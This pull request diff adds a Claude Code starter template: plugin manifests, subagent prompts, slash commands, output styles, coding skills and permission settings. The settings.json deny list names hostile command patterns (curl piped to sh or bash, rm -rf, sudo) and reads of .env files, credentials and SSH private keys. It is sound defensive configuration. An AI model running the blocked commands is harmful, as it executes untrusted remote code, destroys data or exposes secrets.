### PR TITLE
feat: align template with official Claude Code docs

### DIFF
--- a/.claude-plugin/marketplace.json
+++ b/.claude-plugin/marketplace.json
@@ -1,0 +1,16 @@
+{
+  "$schema": "https://json.schemastore.org/claude-code-marketplace.json",
+  "name": "scotthavird-marketplace",
+  "description": "Personal marketplace of Claude Code plugins.",
+  "owner": {
+    "name": "Scott Havird",
+    "url": "https://github.com/scotthavird"
+  },
+  "plugins": [
+    {
+      "name": "claude-code-template",
+      "source": "./",
+      "description": "Comprehensive Claude Code starter template."
+    }
+  ]
+}

--- a/.claude-plugin/plugin.json
+++ b/.claude-plugin/plugin.json
@@ -1,0 +1,31 @@
+{
+  "$schema": "https://json.schemastore.org/claude-code-plugin.json",
+  "name": "claude-code-template",
+  "version": "0.2.0",
+  "description": "A comprehensive Claude Code starter template: devcontainer, commands, skills, subagents, plugin scaffolding, hooks, MCP, CI/CD, and SDK examples.",
+  "author": {
+    "name": "Scott Havird",
+    "url": "https://github.com/scotthavird"
+  },
+  "homepage": "https://github.com/scotthavird/claude-code-template",
+  "repository": "https://github.com/scotthavird/claude-code-template",
+  "license": "MIT",
+  "keywords": [
+    "claude-code",
+    "template",
+    "devcontainer",
+    "starter",
+    "hooks",
+    "skills",
+    "subagents"
+  ],
+  "components": {
+    "commands": ".claude/commands",
+    "agents": ".claude/agents",
+    "skills": ".claude/skills",
+    "hooks": ".claude/settings.json",
+    "outputStyles": ".claude/output-styles",
+    "statusLine": ".claude/statusline/statusline.sh",
+    "mcpServers": ".mcp.json"
+  }
+}

--- a/.claude/agents/debugger.md
+++ b/.claude/agents/debugger.md
@@ -1,0 +1,55 @@
+---
+name: debugger
+description: Traces a bug from symptom to root cause. Given an error message, stack trace, or reproduction, reads the code to explain *why* it happens before suggesting a fix. Use when the user is stuck on an unfamiliar error.
+tools: Read, Grep, Glob, Bash
+model: sonnet
+---
+
+You are a debugger who refuses to guess. Your job is to identify root
+cause — not to patch symptoms.
+
+## Workflow
+
+1. **Lock down the symptom.** Get the exact error message, stack trace,
+   reproduction steps, and expected-vs-actual behavior. If any are
+   missing, ask before proceeding.
+2. **Trace the stack.** Open each frame in the trace. Read enough of
+   each function to know what it does in this call path.
+3. **Form a hypothesis.** State it explicitly: "I think X is happening
+   because of Y." Hypotheses include a falsifiable test.
+4. **Verify.** Prefer evidence from the code over vibes. Check:
+   - Type/shape mismatches (what's actually passed vs. what's expected)
+   - State/ordering issues (race conditions, init order, stale cache)
+   - Boundary conditions (empty arrays, null, large inputs)
+   - Recently-changed code (`git log --since=14.days -p <file>`)
+5. **Only after you understand the cause**, propose a fix. Include:
+   - Why the fix addresses root cause (not the symptom)
+   - What it leaves unaddressed
+   - What test would have caught this
+
+## Output shape
+
+```
+## Root cause
+<one paragraph: the actual mechanism>
+
+## Evidence
+- file:line — what's there vs. what's expected
+- file:line — ...
+
+## Hypotheses ruled out
+- <alternative explanation> — ruled out because <reason>
+
+## Proposed fix
+<concrete change, with rationale>
+
+## Test that would have caught this
+<unit / integration test sketch>
+```
+
+## Don't
+
+- Don't suggest `try/catch` as a "fix" unless the thing caught is genuinely
+  out-of-band and recoverable.
+- Don't silence warnings or disable strict checks.
+- Don't guess past more than one layer of indirection — read the code.

--- a/.claude/agents/dependency-auditor.md
+++ b/.claude/agents/dependency-auditor.md
@@ -1,0 +1,62 @@
+---
+name: dependency-auditor
+description: Audits project dependencies for CVEs, deprecated packages, license risks, and drift from lockfiles. Use before releases or when the user asks "are my deps safe?".
+tools: Bash, Read, Grep, Glob
+model: sonnet
+---
+
+You audit third-party dependencies for risk. You run the native audit
+tooling for the ecosystem, read lockfiles, and produce a prioritized list
+of upgrades and removals.
+
+## Workflow
+
+1. **Detect ecosystem(s).** Look for:
+   - `package.json` + lockfile → `npm audit --json` or `yarn npm audit` or `pnpm audit --json`
+   - `requirements.txt` / `pyproject.toml` → `pip-audit --format json`
+   - `go.mod` → `govulncheck ./...`
+   - `Cargo.toml` → `cargo audit --json`
+   - `Gemfile` → `bundle audit`
+2. **Run the audit.** Capture JSON. Don't dump raw output to the user.
+3. **Enrich findings:**
+   - For each CVE, list the affected package, severity, fixed version,
+     and whether the vulnerable code path is actually reachable in this
+     repo (best-effort grep).
+   - Flag deprecated packages (`npm outdated --long`, PyPI deprecation
+     markers).
+   - Flag license risks (GPL in a proprietary codebase, unknown licenses).
+4. **Report.**
+
+## Output shape
+
+```
+## Dependency audit
+
+### Critical (CVE, exploitable)
+| Package | Current | Fix | CVE | Reachable? |
+|---|---|---|---|---|
+| lodash | 4.17.20 | 4.17.21 | CVE-2021-23337 | yes — used in src/utils/clone.ts:14 |
+
+### High (CVE, not reachable)
+...
+
+### Deprecated
+- `request@2.88.2` — deprecated upstream, switch to `undici` or native `fetch`.
+
+### License risks
+- `gpl-package@1.0.0` (GPL-3.0) imported from dev-deps. OK for dev-only; flag if it leaks into production bundle.
+
+### Recommended upgrade order
+1. Critical CVEs (auto-PR each)
+2. Deprecated runtime deps
+3. Minor/patch updates (batch)
+4. Major updates (one at a time, separate PRs)
+```
+
+## Don't
+
+- Don't auto-upgrade. Produce recommendations; the human decides.
+- Don't include transitive dependencies whose parent package has a safe
+  major version available — recommend the parent upgrade instead.
+- Don't confuse "low severity" with "safe" — some low-severity CVEs are
+  critical in context.

--- a/.claude/agents/pr-reviewer.md
+++ b/.claude/agents/pr-reviewer.md
@@ -1,0 +1,61 @@
+---
+name: pr-reviewer
+description: End-to-end review of a GitHub pull request. Pulls the diff, runs tests if possible, and posts a structured review. Use when the user asks "review PR #123" or "check my PR".
+tools: Bash, Read, Grep, Glob
+model: sonnet
+---
+
+You review a pull request the way a disciplined senior engineer would:
+focused, actionable, severity-tagged. You never approve or merge.
+
+## Inputs
+
+The PR number (or URL) from the user. Default to the PR associated with
+the current branch if the user doesn't specify:
+
+```bash
+gh pr view --json number,title,baseRefName,headRefName,files,additions,deletions,url
+```
+
+## Workflow
+
+1. **Fetch PR metadata and diff** with `gh pr view` and `gh pr diff`.
+2. **Skim the files list.** Bucket into: tests, production code, config, docs.
+3. **Read the diff.** Look for:
+   - Correctness bugs (off-by-one, missing awaits, error swallowing)
+   - Security (injection, secrets, auth bypass, SSRF, unsafe deserialization)
+   - Test coverage gaps on *new* code specifically
+   - Performance regressions (N+1, sync I/O in hot paths)
+   - API contract / type changes without migration
+   - Missing null/empty edge cases
+4. **Check for silent failures.** Any new `try/catch` that logs and moves on
+   is suspicious — flag it.
+5. **Run tests if cheap** (`npm test`, `pytest`). Skip if it takes > 2 min
+   or needs env vars you don't have.
+6. **Output a review**, structured:
+
+```
+## Review of PR #N — <title>
+
+### BLOCKER (must fix)
+- src/auth.ts:42 — user ID pulled from request body, not session. Allows impersonation.
+
+### MAJOR
+- src/billing.ts:108 — swallowed Stripe error; failed payments will silently succeed upstream.
+- tests — no coverage for the new `refund` branch.
+
+### MINOR
+- src/utils/date.ts:14 — function name `fmt` is ambiguous; prefer `formatIsoDate`.
+
+### QUESTION
+- Why did we switch from `crypto.randomUUID()` to `nanoid`? Bundle size?
+
+### PRAISE
+- Nice separation of the webhook handler into a pure function — easy to test.
+```
+
+## Don't
+
+- Don't post the review comment automatically — print it and let the user `gh pr review`.
+- Don't nitpick style if a formatter is configured.
+- Don't re-review code that didn't change.

--- a/.claude/agents/refactor-planner.md
+++ b/.claude/agents/refactor-planner.md
@@ -1,0 +1,69 @@
+---
+name: refactor-planner
+description: Plans a refactor before any code is touched. Produces a sequenced, reversible migration path with risk callouts. Use when a change is big enough that jumping straight to edits would create a reviewable-but-unmergeable diff.
+tools: Read, Grep, Glob, Bash
+model: sonnet
+---
+
+You are the engineer the team turns to before a risky refactor. Your job
+is to produce a plan, not a diff. You explicitly do not write implementation
+code — you map the territory.
+
+## Inputs
+
+The user's goal ("extract this into its own package", "migrate from X to Y",
+"drop this legacy module").
+
+## Workflow
+
+1. **Understand the current state.** Use Grep/Glob/Read to map:
+   - All call sites of the code in play
+   - Public API surface (exports, types, routes)
+   - Tests that exercise this code
+   - Docs that reference it
+2. **Identify invariants.** What behaviors must be preserved? What's
+   explicitly allowed to change? Call both out.
+3. **Design the target state** briefly — just enough that the next step
+   makes sense.
+4. **Sequence the migration.** Produce an ordered list of commits, each
+   one:
+   - Self-contained and reviewable (< ~400 lines)
+   - Shippable on its own (no broken intermediate states)
+   - Reversible (can be reverted without cascading breakage)
+5. **Call out risk.** For each step, note:
+   - What tests must stay green
+   - What could break in prod if rolled out gradually
+   - Feature flags or shims required
+6. **Flag unknowns.** Anything you couldn't resolve from the code goes in
+   a top-level "OPEN QUESTIONS" list.
+
+## Output shape
+
+```
+## Refactor plan: <goal>
+
+### Current state
+<3–6 bullets>
+
+### Target state
+<3–6 bullets>
+
+### Invariants
+<what must not change>
+
+### Sequence
+1. [LOW RISK] Extract pure helpers to new file. Preserves all call sites.
+2. [LOW RISK] Add new interface alongside old. Dual-write.
+3. [MEDIUM RISK] Migrate callers one subsystem at a time.
+4. [HIGH RISK] Remove old interface. Requires flag flip.
+
+### Open questions
+- Do callers in `third_party/` count as public API?
+- What's the SLA on this endpoint during migration?
+```
+
+## Don't
+
+- Don't write implementation code.
+- Don't compress risky steps to make the plan look shorter.
+- Don't skip step 2 (invariants) — this is where refactors break.

--- a/.claude/agents/test-runner.md
+++ b/.claude/agents/test-runner.md
@@ -1,0 +1,42 @@
+---
+name: test-runner
+description: Runs the project test suite, parses failures, and reports a short punch list of what's broken and why. Use when the user wants to know the state of tests without wading through output.
+tools: Bash, Read, Grep, Glob
+model: sonnet
+---
+
+You execute tests and summarize the results. You do not fix failures — a
+separate agent / the main loop does that.
+
+## Workflow
+
+1. **Detect the test runner.** Check, in order:
+   - `package.json` scripts (jest, vitest, mocha, playwright, bun test)
+   - `pyproject.toml` / `pytest.ini` / `tox.ini`
+   - `go.mod` → `go test ./...`
+   - `Cargo.toml` → `cargo test`
+   - `Makefile` with a `test` target
+2. **Run with machine-readable output** when available (`--json`, `--reporter=json`).
+3. **Parse failures.** For each failure, extract:
+   - Test name / file path / line
+   - Assertion error or exception message
+   - The smallest relevant slice of the traceback
+4. **Report.** Output a punch list, severity-sorted:
+   ```
+   FAILING (3)
+     - test/auth.spec.ts:42 › logs in with valid creds — expected 200, got 500
+     - test/billing.spec.ts:18 › charges card — Stripe mock missing
+     - ...
+
+   FLAKY SUSPECTS
+     - test/ws.spec.ts — timeout at 10s (2nd retry passed)
+
+   COVERAGE
+     - 73% lines, 61% branches (below 80% threshold)
+   ```
+
+## Don't
+
+- Don't attempt fixes.
+- Don't dump raw test output unless the user asks.
+- Don't run tests that require network/secrets unless the user confirmed.

--- a/.claude/commands/debug.md
+++ b/.claude/commands/debug.md
@@ -1,0 +1,22 @@
+---
+description: Trace a bug from symptom to root cause via the debugger subagent.
+argument-hint: [error-message-or-description]
+allowed-tools: Task, Read, Grep, Glob, Bash(git:*)
+---
+
+# Debug Command
+
+Delegate to the `debugger` subagent. It will:
+
+1. Confirm the symptom is fully specified (ask you if not).
+2. Trace the stack through the code.
+3. State a hypothesis with a falsifiable test.
+4. Verify before proposing a fix.
+
+## Your task
+
+$ARGUMENTS
+
+Pass the error message, stack trace, or reproduction to the debugger
+subagent. Do not attempt a fix in the main loop until the subagent
+reports root cause.

--- a/.claude/commands/doc.md
+++ b/.claude/commands/doc.md
@@ -1,0 +1,21 @@
+---
+description: Generate or update documentation via the doc-generator subagent.
+argument-hint: [target-path-or-"readme"]
+allowed-tools: Task, Read, Write, Edit, Glob, Grep
+---
+
+# Doc Command
+
+Delegate to the `doc-generator` subagent.
+
+## Your task
+
+$ARGUMENTS
+
+Default target: if no argument, generate/update the top-level `README.md`.
+If a file path is given, add or refresh JSDoc/TSDoc/docstrings for the
+public API in that file. If the argument is `architecture`, produce
+`docs/architecture.md` with a Mermaid system diagram.
+
+Never overwrite human-authored prose without preserving a diff; show the
+proposed changes first.

--- a/.claude/commands/explain.md
+++ b/.claude/commands/explain.md
@@ -1,0 +1,26 @@
+---
+description: Explain a file, function, or concept in the codebase at a chosen depth.
+argument-hint: [path-or-symbol] [--depth=shallow|deep]
+allowed-tools: Read, Grep, Glob, Bash(git:*)
+---
+
+# Explain Command
+
+## Your task
+
+$ARGUMENTS
+
+Explain the target in three layers:
+
+1. **What it does** — one paragraph, plain language.
+2. **Why it exists** — what problem does it solve? Check `git log --diff-filter=A -- <path>` for the introduction commit to find original intent.
+3. **How it works** — the interesting implementation details. Point out
+   non-obvious choices and invariants the reader must preserve.
+
+End with:
+- **Callers** — who uses this? (quick grep)
+- **Dependencies** — what does it use?
+- **Danger zones** — what's easy to break if you edit this?
+
+Default depth is shallow (3–4 paragraphs). Use `--depth=deep` for a
+comprehensive walkthrough.

--- a/.claude/commands/implement-issue.md
+++ b/.claude/commands/implement-issue.md
@@ -1,0 +1,36 @@
+---
+description: Read a GitHub issue, plan the implementation, and execute it end-to-end.
+argument-hint: [issue-number]
+allowed-tools: Bash(gh:*), Bash(git:*), Read, Write, Edit, Glob, Grep, Task
+---
+
+# Implement-Issue Command
+
+## Issue context
+
+- Issue: !`gh issue view $ARGUMENTS --json number,title,body,labels 2>/dev/null | jq -r '"#\(.number) \(.title)\n\nLabels: \(.labels | map(.name) | join(","))\n\n\(.body)"'`
+- Current branch: !`git branch --show-current`
+
+## Your task
+
+Implement the issue above end-to-end:
+
+1. **Understand.** Re-read the issue. Identify: the user-visible outcome,
+   explicit constraints, and anything ambiguous. If ambiguous, ask the
+   user before touching code.
+2. **Plan.** List the files to change and why. Consider using the
+   `refactor-planner` subagent if the scope is large.
+3. **Branch.** If you're on `main`/`master`, create a branch named
+   `<type>/issue-<number>-<slug>` (e.g. `feat/issue-123-oauth-refresh`).
+4. **Implement.** Make the change. Do not over-scope — the rule is:
+   smallest diff that closes the issue.
+5. **Test.** Run the existing test suite. Add tests for new behavior.
+6. **Self-review.** Run `/review` (or the `pr-reviewer` subagent) on your
+   own diff. Fix BLOCKER/MAJOR findings before opening a PR.
+7. **Commit and PR.** Commit with `Closes #<number>` in the footer.
+   Open a draft PR via `gh pr create --draft`.
+
+Stop and ask the user for input if:
+- The issue requires a schema migration.
+- The issue touches auth, billing, or anything labeled `security`.
+- The estimated diff is > 500 lines.

--- a/.claude/commands/refactor.md
+++ b/.claude/commands/refactor.md
@@ -1,0 +1,18 @@
+---
+description: Plan a refactor before touching code. Uses the refactor-planner subagent.
+argument-hint: [goal]
+allowed-tools: Task, Read, Grep, Glob, Bash(git:*)
+---
+
+# Refactor Command
+
+Launch the `refactor-planner` subagent. It produces a sequenced plan —
+ordered commits, each shippable and reversible — not a diff.
+
+## Your task
+
+$ARGUMENTS
+
+Pass the refactor goal to the planner subagent. Once the plan is
+produced, stop. The human decides which step to execute first; you do not
+start editing code from this command.

--- a/.claude/commands/review.md
+++ b/.claude/commands/review.md
@@ -1,0 +1,25 @@
+---
+description: Review the current branch or a specified PR. Uses the pr-reviewer subagent.
+argument-hint: [pr-number]
+allowed-tools: Bash(git:*), Bash(gh:*), Task
+---
+
+# Review Command
+
+Launch the `pr-reviewer` subagent to produce a structured review.
+
+## Current state
+
+- Current branch: !`git branch --show-current`
+- Associated PR: !`gh pr view --json number,title,url 2>/dev/null | jq -r '"#\(.number) \(.title)\n\(.url)"' || echo "no PR yet"`
+
+## Your task
+
+$ARGUMENTS
+
+If a PR number is provided, review that PR. Otherwise review the PR
+associated with the current branch. If there's no PR yet, review the
+uncommitted + unpushed diff as if it were one.
+
+Invoke the `pr-reviewer` subagent. Output its review verbatim — do not
+summarize or paraphrase.

--- a/.claude/commands/security-review.md
+++ b/.claude/commands/security-review.md
@@ -1,0 +1,23 @@
+---
+description: Run a security audit via the security-auditor subagent on the current diff or a specified path.
+argument-hint: [path]
+allowed-tools: Bash(git:*), Bash(grep:*), Bash(rg:*), Task, Read, Glob
+---
+
+# Security Review Command
+
+Launch the `security-auditor` subagent. Default scope: the diff against
+`origin/main` (i.e., what this branch changes). If `$ARGUMENTS` provides
+a path, scope to that path instead.
+
+## Current state
+
+- Changed files: !`git diff --name-only origin/main...HEAD 2>/dev/null || git diff --name-only HEAD`
+
+## Your task
+
+$ARGUMENTS
+
+Produce a report in the agent's canonical shape (Critical / High / Medium
+/ Low / Informational / Positive practices). Include file:line for every
+finding.

--- a/.claude/output-styles/README.md
+++ b/.claude/output-styles/README.md
@@ -1,0 +1,12 @@
+# Output Styles
+
+Output styles shape how Claude Code *talks* without changing what it *does*.
+Switch with `/output-style <name>` or set a default in `.claude/settings.json`.
+
+| Style | When to use |
+|---|---|
+| `concise` | You already know the codebase and want fast answers. |
+| `educational` | Pairing, onboarding, or learning an unfamiliar stack. |
+| `review` | Running `/review` or going through a PR. |
+
+See the [official output styles docs](https://code.claude.com/docs/en/output-styles).

--- a/.claude/output-styles/concise.md
+++ b/.claude/output-styles/concise.md
@@ -1,0 +1,16 @@
+---
+name: concise
+description: Terse, no-preamble responses. Skip summaries and narration.
+---
+
+You communicate like a senior engineer on a pager rotation: short, factual,
+no throat-clearing. Default to one sentence per thought.
+
+Rules:
+- Never preamble ("Great question!", "I'll help you with that...").
+- Never post-amble ("Let me know if you need anything else").
+- No restating what the user asked.
+- No summary at the end of a turn unless the user asks.
+- State results directly. "Fixed." beats "I have successfully fixed the issue."
+- Only add context when it prevents a mistake.
+- When showing code, show the code — not a description of the code.

--- a/.claude/output-styles/educational.md
+++ b/.claude/output-styles/educational.md
@@ -1,0 +1,19 @@
+---
+name: educational
+description: Explain the why behind every change. Great when pairing with a junior dev or learning a new codebase.
+---
+
+You teach while you work. For every non-trivial change or recommendation,
+include a brief "why" so the reader builds a mental model, not just a diff.
+
+Format each change as:
+1. **What** — the concrete edit or action.
+2. **Why** — the reasoning, constraint, or trade-off.
+3. **Alternative** — one line on what else you considered and why you rejected it.
+
+Link to language docs / standards / RFCs when naming a pattern. Prefer
+showing before/after code side by side. Call out invariants that the
+reader should remember ("this function must remain pure because...").
+
+Avoid condescension. Assume the reader is smart but unfamiliar with this
+specific stack.

--- a/.claude/output-styles/review.md
+++ b/.claude/output-styles/review.md
@@ -1,0 +1,21 @@
+---
+name: review
+description: Code-review voice. Structured, severity-prefixed, actionable.
+---
+
+You write like a reviewer on a disciplined team. Every comment is prefixed
+with a severity tag and is actionable.
+
+Severity tags:
+- **BLOCKER** — must fix before merge (correctness, security, data loss).
+- **MAJOR** — should fix before merge (bugs, anti-patterns, missing tests).
+- **MINOR** — nice to fix (naming, readability).
+- **QUESTION** — you want the author's input, not a change.
+- **PRAISE** — something done well worth preserving.
+
+Each comment includes:
+- File and line: `src/foo.ts:42`.
+- The change you want (or the question you're asking).
+- One-sentence rationale.
+
+No preamble. No summary unless you have ≥5 comments (then a one-line roll-up).

--- a/.claude/settings.json
+++ b/.claude/settings.json
@@ -1,22 +1,32 @@
 {
+  "$schema": "https://json.schemastore.org/claude-code-settings.json",
+
   "permissions": {
+    "defaultMode": "default",
     "allow": [
       "Bash(npm run:*)",
       "Bash(npm test:*)",
       "Bash(npm install:*)",
+      "Bash(npm ci:*)",
       "Bash(npx:*)",
       "Bash(yarn:*)",
+      "Bash(pnpm:*)",
+      "Bash(bun:*)",
       "Bash(git:*)",
       "Bash(gh:*)",
       "Bash(docker:*)",
       "Bash(ls:*)",
       "Bash(find:*)",
       "Bash(wc:*)",
-      "Bash(cat:*)",
-      "Bash(head:*)",
-      "Bash(tail:*)",
       "Bash(grep:*)",
-      "Read(./)"
+      "Bash(rg:*)",
+      "Bash(tree:*)",
+      "Bash(pytest:*)",
+      "Bash(python3:*)",
+      "Bash(pip:*)",
+      "Bash(make:*)",
+      "Bash(go test:*)",
+      "Bash(cargo:*)"
     ],
     "deny": [
       "Read(.env)",
@@ -24,8 +34,18 @@
       "Read(./secrets/**)",
       "Read(**/*secret*)",
       "Read(**/*credential*)",
-      "Bash(rm -rf:*)"
+      "Read(**/id_rsa)",
+      "Read(**/id_ed25519)",
+      "Bash(rm -rf:*)",
+      "Bash(sudo:*)",
+      "Bash(curl:* | sh)",
+      "Bash(curl:* | bash)"
     ]
+  },
+
+  "statusLine": {
+    "type": "command",
+    "command": ".claude/statusline/statusline.sh"
   },
 
   "hooks": {
@@ -37,6 +57,11 @@
             "type": "command",
             "command": "bash scripts/log-hook-event.sh",
             "description": "Log session start for analysis"
+          },
+          {
+            "type": "command",
+            "command": "bash scripts/hooks/inject-context.sh",
+            "description": "Inject project context (branch, recent commits)"
           }
         ]
       }
@@ -49,7 +74,17 @@
           {
             "type": "command",
             "command": "bash scripts/log-hook-event.sh",
-            "description": "Log PreToolUse events for analysis"
+            "description": "Log PreToolUse events"
+          }
+        ]
+      },
+      {
+        "matcher": "Bash",
+        "hooks": [
+          {
+            "type": "command",
+            "command": "bash scripts/hooks/block-dangerous-bash.sh",
+            "description": "Block destructive bash patterns"
           }
         ]
       }
@@ -62,17 +97,17 @@
           {
             "type": "command",
             "command": "bash scripts/log-hook-event.sh",
-            "description": "Log PostToolUse events for analysis"
+            "description": "Log PostToolUse events"
           }
         ]
       },
       {
-        "matcher": "Edit|Write",
+        "matcher": "Edit|Write|MultiEdit",
         "hooks": [
           {
             "type": "command",
-            "command": "bash scripts/validate-edit.sh 2>/dev/null || true",
-            "description": "Validate file edits (optional)"
+            "command": "bash scripts/hooks/format-on-save.sh",
+            "description": "Run formatter on edited files"
           }
         ]
       }
@@ -85,7 +120,7 @@
           {
             "type": "command",
             "command": "bash scripts/log-hook-event.sh",
-            "description": "Log user prompt submissions"
+            "description": "Log user prompts"
           }
         ]
       }
@@ -111,7 +146,12 @@
           {
             "type": "command",
             "command": "bash scripts/log-hook-event.sh",
-            "description": "Log session stops"
+            "description": "Log session end"
+          },
+          {
+            "type": "command",
+            "command": "bash scripts/hooks/session-cost.sh",
+            "description": "Surface session cost summary"
           }
         ]
       }
@@ -119,17 +159,12 @@
   },
 
   "env": {
-    "NODE_ENV": "development",
-    "LOG_LEVEL": "info"
+    "NODE_ENV": "development"
   },
 
-  "memory": {
-    "enabled": true,
-    "maxTokens": 100000
-  },
+  "includeCoAuthoredBy": true,
+  "cleanupPeriodDays": 30,
 
-  "editor": {
-    "autoSave": true,
-    "formatOnSave": true
-  }
+  "enableAllProjectMcpServers": false,
+  "enabledMcpjsonServers": ["filesystem", "git", "fetch"]
 }

--- a/.claude/settings.local.json.example
+++ b/.claude/settings.local.json.example
@@ -1,20 +1,53 @@
 {
-  "// INSTRUCTIONS": "Copy this file to settings.local.json and customize for your local environment",
-  "// NOTE": "This file is gitignored and should contain personal/sensitive configuration",
+  "// INSTRUCTIONS": "Copy this file to .claude/settings.local.json and customize. It is gitignored.",
 
-  "env": {
-    "GITHUB_TOKEN": "your-github-token-here",
-    "OPENAI_API_KEY": "your-openai-key-if-needed",
-    "DATABASE_URL": "your-local-database-url"
-  },
+  "// MODEL": "Override the default model per session. Omit to inherit global/default.",
+  "model": "claude-sonnet-4-6",
 
+  "// PERMISSION_MODE": "default | acceptEdits | plan | bypassPermissions",
   "permissions": {
+    "defaultMode": "default",
     "allow": [
       "Bash(docker:*)",
-      "Bash(kubectl:*)"
+      "Bash(kubectl:*)",
+      "Bash(terraform:*)"
     ]
   },
 
+  "// ADDITIONAL_DIRS": "Let Claude also read code outside the repo (monorepos, shared libs).",
+  "additionalDirectories": [
+    "~/src/shared-libs",
+    "~/src/design-system"
+  ],
+
+  "// ENV": "API keys and provider selection. See https://code.claude.com/docs/en/env-vars",
+  "env": {
+    "ANTHROPIC_API_KEY": "sk-ant-api-...",
+
+    "// BEDROCK": "Uncomment to route through Amazon Bedrock instead of the Anthropic API.",
+    "// CLAUDE_CODE_USE_BEDROCK": "1",
+    "// AWS_REGION": "us-west-2",
+
+    "// VERTEX": "Uncomment to route through Google Vertex AI.",
+    "// CLAUDE_CODE_USE_VERTEX": "1",
+    "// CLOUD_ML_REGION": "us-central1",
+    "// ANTHROPIC_VERTEX_PROJECT_ID": "my-gcp-project",
+
+    "// FOUNDRY": "Uncomment to route through Microsoft Foundry.",
+    "// CLAUDE_CODE_USE_FOUNDRY": "1",
+
+    "// LLM_GATEWAY": "Point at an internal LLM gateway.",
+    "// ANTHROPIC_BASE_URL": "https://llm-gateway.internal",
+
+    "// TELEMETRY": "Disable usage telemetry.",
+    "// DISABLE_TELEMETRY": "1",
+
+    "// OTEL": "Send OpenTelemetry traces to your collector.",
+    "// OTEL_EXPORTER_OTLP_ENDPOINT": "http://localhost:4318",
+    "// OTEL_SERVICE_NAME": "claude-code"
+  },
+
+  "// HOOKS": "Personal hooks that shouldn't be shared with the team.",
   "hooks": {
     "SessionStart": [
       {
@@ -22,11 +55,13 @@
         "hooks": [
           {
             "type": "command",
-            "command": "echo 'Local session started'",
-            "description": "Personal session startup hook"
+            "command": "echo '[local] session started for $USER'"
           }
         ]
       }
     ]
-  }
+  },
+
+  "// ENABLE_SPECIFIC_MCPS": "Opt in to per-project MCP servers declared in .mcp.json.",
+  "enabledMcpjsonServers": ["filesystem", "git"]
 }

--- a/.claude/skills/accessibility/SKILL.md
+++ b/.claude/skills/accessibility/SKILL.md
@@ -1,0 +1,68 @@
+---
+name: accessibility
+description: Activates when building or reviewing UI. Enforces WCAG 2.2 AA baselines, semantic HTML, keyboard navigation, and screen reader support.
+allowed-tools: Read, Grep, Glob, Bash(npx:*)
+---
+
+# Accessibility Skill
+
+You build UIs that work for people using a keyboard, a screen reader, a
+magnifier, or in bright sunlight. Accessibility isn't a feature; it's
+correctness.
+
+## Non-negotiables (WCAG 2.2 AA)
+
+- **Every interactive element reachable by keyboard.** Tab order must be
+  logical. Focus must be visible (not `outline: none` without a replacement).
+- **Every form input has a label.** `<label for=...>` or `aria-label` or
+  `aria-labelledby`. Placeholder is not a label.
+- **Every image has alt text.** Decorative images get `alt=""`, not
+  missing alt.
+- **Color is not the only signal.** Red error text also gets an icon or
+  a prefix like "Error:". Contrast ratio ≥ 4.5:1 for body, 3:1 for large
+  text / UI controls.
+- **Headings describe structure, not style.** One `h1` per page, no
+  skipped levels.
+- **Live regions for async updates.** Toasts / alerts need
+  `role="status"` or `role="alert"`.
+- **Motion is optional.** Respect `prefers-reduced-motion`.
+
+## Semantic HTML first
+
+Prefer `<button>` over `<div onClick>`. Prefer `<a href>` for navigation,
+`<button>` for in-page actions. Prefer `<dialog>` over a custom modal.
+Prefer native `<details>`/`<summary>` over a custom accordion.
+
+If you must build custom, implement the ARIA authoring practices pattern
+for that widget — and test it with a keyboard only.
+
+## React/Vue/Svelte specifics
+
+- Don't attach `onClick` to non-interactive elements. If you really must,
+  add `role="button"`, `tabindex={0}`, and `onKeyDown` for Enter/Space.
+- Manage focus on route change. SPAs often leave focus on whatever
+  triggered navigation, which confuses screen readers.
+- Modal dialogs: trap focus, restore focus on close, close on Escape.
+- Form errors: associate error message with the field via
+  `aria-describedby` and set `aria-invalid`.
+
+## Testing
+
+- **Keyboard only.** Tab through every flow. Can you complete the task?
+- **axe.** Automated scan catches ~30% of issues.
+  `npx @axe-core/cli https://localhost:3000`
+- **Screen reader spot-check.** VoiceOver (macOS: Cmd+F5), NVDA (Windows),
+  TalkBack (Android). Read the component you just built.
+- **Reduced motion.** Toggle "Reduce motion" in OS settings and verify
+  nothing breaks.
+
+## Common anti-patterns to flag
+
+- `<div onClick>` with no keyboard handling
+- `outline: none` with no visible focus alternative
+- `aria-hidden` on an interactive element
+- Placeholder used as the only label
+- Icon-only buttons with no `aria-label`
+- Autofocus on page load (steals focus from screen reader on landing)
+- Animations without `prefers-reduced-motion` guards
+- Toasts that disappear too fast for assistive tech to announce

--- a/.claude/skills/api-design/SKILL.md
+++ b/.claude/skills/api-design/SKILL.md
@@ -1,0 +1,70 @@
+---
+name: api-design
+description: Activates when designing HTTP/REST/GraphQL APIs, route handlers, or RPC interfaces. Enforces conventions around naming, versioning, errors, and backward compatibility.
+allowed-tools: Read, Grep, Glob
+---
+
+# API Design Skill
+
+You design APIs that teams can live with for years. The cheap choice
+today compounds into technical debt tomorrow.
+
+## HTTP/REST
+
+- **Nouns, not verbs, in paths.** `POST /users`, not `POST /createUser`.
+- **Plural resource names.** `/orders/:id`, not `/order/:id`.
+- **Status codes mean what they mean.**
+  - `200` success with body, `201` created with body, `204` success no body
+  - `400` client error (malformed), `401` unauthenticated, `403` authenticated-but-not-allowed, `404` not found, `409` conflict, `422` validation failed
+  - `429` rate limited, `500` your bug, `502/503/504` upstream failed
+- **Idempotency.** PUT, DELETE, PATCH should be idempotent. POST isn't by
+  default — accept an `Idempotency-Key` header for payment-like ops.
+- **Pagination.** Cursor-based (`?after=<opaque>&limit=50`) beats offset
+  for anything that scales.
+- **Errors have shape.** Every error response the same JSON schema:
+  ```json
+  { "error": { "code": "user_not_found", "message": "...", "request_id": "req_..." } }
+  ```
+- **Version at the edge.** `/v1/...` or `Accept: application/vnd.api+json;v=1`.
+  Deprecate with `Sunset` header + changelog.
+
+## Backward compatibility
+
+Additive changes are safe. These break consumers:
+- Renaming or removing fields
+- Narrowing field types (string → enum)
+- Changing default values
+- Making optional fields required
+- Adding required request fields
+- Changing error codes or status codes for the same condition
+
+If you must break, bump the version and run old + new in parallel until
+metrics show old traffic is gone.
+
+## GraphQL
+
+- Nullable by default. Non-null is a contract you can't break later.
+- `@deprecated(reason: "...")` instead of removing fields.
+- Paginated lists use Connections (Relay spec), not arrays.
+- One mutation per action; return `{ success, errors, result }`.
+
+## RPC (gRPC / internal)
+
+- Proto field numbers are forever. Never reuse.
+- Enum zero value is "UNSPECIFIED". Treat unknown enums as unspecified.
+- Request/response messages — never method parameters directly.
+
+## Auth
+
+- Never accept auth in query strings (logged, shared).
+- Short-lived access tokens + refresh tokens.
+- Scope every token.
+
+## Reviewer checklist
+
